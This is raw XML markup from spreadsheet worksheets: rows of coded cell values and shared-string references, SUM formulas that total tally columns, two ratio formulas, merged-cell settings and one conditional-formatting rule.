      <c r="A23" s="4" t="s">
        <v>638</v>
      </c>
      <c r="B23" s="4" t="s">
        <v>642</v>
      </c>
      <c r="C23" s="4">
        <v>1.0</v>
      </c>
      <c r="D23" s="4" t="s">
        <v>635</v>
      </c>
      <c r="E23" s="4">
        <v>1.0</v>
      </c>
      <c r="F23" s="4" t="s">
        <v>626</v>
      </c>
      <c r="G23" s="4">
        <v>1.0</v>
      </c>
      <c r="H23" s="4">
        <v>1.0</v>
      </c>
      <c r="I23" s="4" t="s">
        <v>643</v>
      </c>
      <c r="J23" s="4">
        <v>1.0</v>
      </c>
      <c r="K23" s="4">
        <v>0.0</v>
      </c>
      <c r="L23" s="4" t="s">
        <v>644</v>
      </c>
      <c r="M23" s="4">
        <v>1.0</v>
      </c>
      <c r="N23" s="4"/>
      <c r="O23" s="4"/>
      <c r="P23" s="4"/>
      <c r="Q23" s="4"/>
      <c r="R23" s="4"/>
      <c r="S23" s="4"/>
      <c r="T23" s="4"/>
      <c r="U23" s="4"/>
      <c r="W23" s="4">
        <v>1.0</v>
      </c>
      <c r="Y23" s="4">
        <v>1.0</v>
      </c>
      <c r="Z23" s="4" t="s">
        <v>645</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1">
      <c r="A24" s="4" t="s">
        <v>646</v>
      </c>
      <c r="C24" s="4">
        <v>1.0</v>
      </c>
      <c r="D24" s="4" t="s">
        <v>635</v>
      </c>
      <c r="E24" s="4">
        <v>1.0</v>
      </c>
      <c r="F24" s="4" t="s">
        <v>626</v>
      </c>
      <c r="G24" s="4">
        <v>1.0</v>
      </c>
      <c r="H24" s="4">
        <v>0.0</v>
      </c>
      <c r="I24" s="4" t="s">
        <v>647</v>
      </c>
      <c r="J24" s="4">
        <v>1.0</v>
      </c>
      <c r="K24" s="4">
        <v>0.0</v>
      </c>
      <c r="L24" s="4" t="s">
        <v>644</v>
      </c>
      <c r="M24" s="4">
        <v>1.0</v>
      </c>
      <c r="N24" s="4"/>
      <c r="O24" s="4"/>
      <c r="P24" s="4"/>
      <c r="Q24" s="4"/>
      <c r="R24" s="4"/>
      <c r="S24" s="4"/>
      <c r="T24" s="4"/>
      <c r="U24" s="4"/>
      <c r="W24" s="4">
        <v>1.0</v>
      </c>
      <c r="Y24" s="4">
        <v>1.0</v>
      </c>
      <c r="Z24" s="4" t="s">
        <v>648</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1">
      <c r="A25" s="4" t="s">
        <v>649</v>
      </c>
      <c r="B25" s="4" t="s">
        <v>650</v>
      </c>
      <c r="C25" s="4">
        <v>1.0</v>
      </c>
      <c r="D25" s="4" t="s">
        <v>635</v>
      </c>
      <c r="E25" s="4">
        <v>1.0</v>
      </c>
      <c r="F25" s="4" t="s">
        <v>626</v>
      </c>
      <c r="G25" s="4">
        <v>1.0</v>
      </c>
      <c r="H25" s="4">
        <v>0.0</v>
      </c>
      <c r="I25" s="4" t="s">
        <v>651</v>
      </c>
      <c r="J25" s="4">
        <v>1.0</v>
      </c>
      <c r="K25" s="4">
        <v>0.0</v>
      </c>
      <c r="L25" s="4" t="s">
        <v>644</v>
      </c>
      <c r="M25" s="4">
        <v>1.0</v>
      </c>
      <c r="P25" s="10">
        <f t="shared" ref="P25:U25" si="1">SUM(P2:P24)</f>
        <v>0</v>
      </c>
      <c r="Q25" s="10">
        <f t="shared" si="1"/>
        <v>10</v>
      </c>
      <c r="R25" s="10">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="S25" s="10">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="T25" s="10">
        <f t="shared" si="1"/>
        <v>17</v>
      </c>
      <c r="U25" s="10">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="W25" s="10">
        <f>SUM(W2:W24)</f>
        <v>23</v>
      </c>
      <c r="X25" s="10">
        <f>SUM(I3:I25)</f>
        <v>0</v>
      </c>
      <c r="Y25" s="10">
        <f>SUM(Y2:Y24)</f>
        <v>5</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1">
      <c r="C26" s="10">
        <f t="shared" ref="C26:H26" si="2">SUM(C3:C25)</f>
        <v>41</v>
      </c>
      <c r="D26" s="10">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="E26" s="10">
        <f t="shared" si="2"/>
        <v>49</v>
      </c>
      <c r="F26" s="10">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="G26" s="10">
        <f t="shared" si="2"/>
        <v>41</v>
      </c>
      <c r="H26" s="10">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="J26" s="10">
        <f t="shared" ref="J26:M26" si="3">SUM(J3:J25)</f>
        <v>50</v>
      </c>
      <c r="K26" s="10">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="L26" s="10">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M26" s="10">
        <f t="shared" si="3"/>
        <v>54</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1">
      <c r="H27" s="10">
        <f>H26/(G26+H26)</f>
        <v>0.08888888889</v>
      </c>
      <c r="K27" s="10">
        <f>K26/(K26+J26)</f>
        <v>0.01960784314</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5">
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
    <mergeCell ref="C1:F1"/>
    <mergeCell ref="G1:L1"/>
    <mergeCell ref="M1:M2"/>
  </mergeCells>
  <conditionalFormatting sqref="P1:V1">
    <cfRule type="notContainsBlanks" dxfId="0" priority="1">
      <formula>LEN(TRIM(P1))&gt;0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v>
      </c>
      <c r="B1" s="1" t="s">
        <v>24</v>
      </c>
      <c r="C1" s="14" t="s">
        <v>1</v>
      </c>
      <c r="G1" s="3" t="s">
        <v>2</v>
      </c>
      <c r="M1" s="4" t="s">
        <v>3</v>
      </c>
      <c r="N1" s="5"/>
      <c r="O1" s="5"/>
      <c r="P1" s="5"/>
      <c r="Q1" s="5"/>
      <c r="R1" s="5"/>
      <c r="S1" s="5"/>
      <c r="T1" s="5"/>
      <c r="U1" s="5"/>
      <c r="V1" s="5"/>
      <c r="W1" s="5"/>
      <c r="X1" s="5"/>
      <c r="Y1" s="5"/>
      <c r="Z1" s="5"/>
      <c r="AA1" s="5"/>
      <c r="AB1" s="5"/>
      <c r="AC1" s="5"/>
      <c r="AD1" s="5"/>
    </row>
    <row r="2" ht="15.75" customHeight="1">
      <c r="C2" s="6" t="s">
        <v>4</v>
      </c>
      <c r="D2" s="6" t="s">
        <v>25</v>
      </c>
      <c r="E2" s="7" t="s">
        <v>5</v>
      </c>
      <c r="F2" s="7" t="s">
        <v>26</v>
      </c>
      <c r="G2" s="8" t="s">
        <v>4</v>
      </c>
      <c r="H2" s="8" t="s">
        <v>27</v>
      </c>
      <c r="I2" s="8" t="s">
        <v>28</v>
      </c>
      <c r="J2" s="9" t="s">
        <v>5</v>
      </c>
      <c r="K2" s="9" t="s">
        <v>29</v>
      </c>
      <c r="L2" s="9" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="3" ht="15.75" customHeight="1">
      <c r="A3" s="4" t="s">
        <v>652</v>
      </c>
      <c r="B3" s="4" t="s">
        <v>653</v>
      </c>
      <c r="C3" s="4">
        <v>1.0</v>
      </c>
      <c r="D3" s="4" t="s">
        <v>654</v>
      </c>
      <c r="E3" s="4">
        <v>1.0</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>655</v>
      </c>
      <c r="G3" s="4">
        <v>1.0</v>
      </c>
      <c r="H3" s="4">
        <v>0.0</v>
      </c>
      <c r="I3" s="4" t="s">
        <v>656</v>
      </c>
      <c r="J3" s="4">
        <v>1.0</v>
      </c>
      <c r="K3" s="4">
        <v>0.0</v>
      </c>
      <c r="L3" s="4" t="s">
        <v>656</v>
      </c>
      <c r="M3" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="4" ht="15.75" customHeight="1">
      <c r="A4" s="4" t="s">
        <v>657</v>
      </c>
      <c r="B4" s="4" t="s">
        <v>658</v>
      </c>
      <c r="C4" s="4">
        <v>1.0</v>
      </c>
      <c r="D4" s="4" t="s">
        <v>654</v>
      </c>
      <c r="E4" s="4">
        <v>1.0</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>655</v>
      </c>
      <c r="G4" s="4">
        <v>1.0</v>
      </c>
      <c r="H4" s="4">
        <v>0.0</v>
      </c>
      <c r="I4" s="4" t="s">
        <v>659</v>
      </c>
      <c r="J4" s="4">
        <v>1.0</v>
      </c>
      <c r="K4" s="4">
        <v>0.0</v>
      </c>
      <c r="L4" s="4" t="s">
        <v>659</v>
      </c>
      <c r="M4" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="5" ht="15.75" customHeight="1">
      <c r="A5" s="4" t="s">
        <v>660</v>
      </c>
      <c r="B5" s="4" t="s">
        <v>661</v>
      </c>
      <c r="C5" s="4">
        <v>1.0</v>
      </c>
      <c r="D5" s="4" t="s">
        <v>654</v>
      </c>
      <c r="E5" s="4">
        <v>1.0</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>655</v>
      </c>
      <c r="G5" s="4">
        <v>1.0</v>
      </c>
      <c r="H5" s="4">
        <v>0.0</v>
      </c>
      <c r="I5" s="4" t="s">
        <v>659</v>
      </c>
      <c r="J5" s="4">
        <v>1.0</v>
      </c>
      <c r="K5" s="4">
        <v>0.0</v>
      </c>
      <c r="L5" s="4" t="s">
        <v>659</v>
      </c>
      <c r="M5" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1">
      <c r="A6" s="4" t="s">
        <v>662</v>
      </c>
      <c r="B6" s="4" t="s">
        <v>661</v>
      </c>
      <c r="C6" s="4">
        <v>1.0</v>
      </c>
      <c r="D6" s="4" t="s">
        <v>654</v>
      </c>
      <c r="E6" s="4">
        <v>1.0</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>655</v>
      </c>
      <c r="G6" s="4">
        <v>0.0</v>
      </c>
      <c r="H6" s="4">
        <v>0.0</v>
      </c>
      <c r="I6" s="4" t="s">
        <v>259</v>
      </c>
      <c r="J6" s="4">
        <v>1.0</v>
      </c>
      <c r="K6" s="4">
        <v>0.0</v>
      </c>
      <c r="L6" s="4" t="s">
        <v>659</v>
      </c>
      <c r="M6" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1">
      <c r="C7" s="10">
        <f t="shared" ref="C7:E7" si="1">SUM(C3:C6)</f>
        <v>4</v>
      </c>
      <c r="D7" s="10">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="E7" s="10">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="G7" s="10">
        <f>SUM(G3:G6)</f>
        <v>3</v>
      </c>
      <c r="J7" s="10">
        <f t="shared" ref="J7:K7" si="2">SUM(J3:J6)</f>
        <v>4</v>
      </c>
      <c r="K7" s="10">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="M7" s="10">
        <f>SUM(M2:M6)</f>
        <v>4</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1"/>
    <row r="9" ht="15.75" customHeight="1"/>
    <row r="10" ht="15.75" customHeight="1"/>
    <row r="11" ht="15.75" customHeight="1"/>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
    <mergeCell ref="C1:F1"/>
    <mergeCell ref="G1:L1"/>
    <mergeCell ref="M1:M2"/>
  </mergeCells>
  <drawing r:id="rId1"/>
</worksheet>
</file>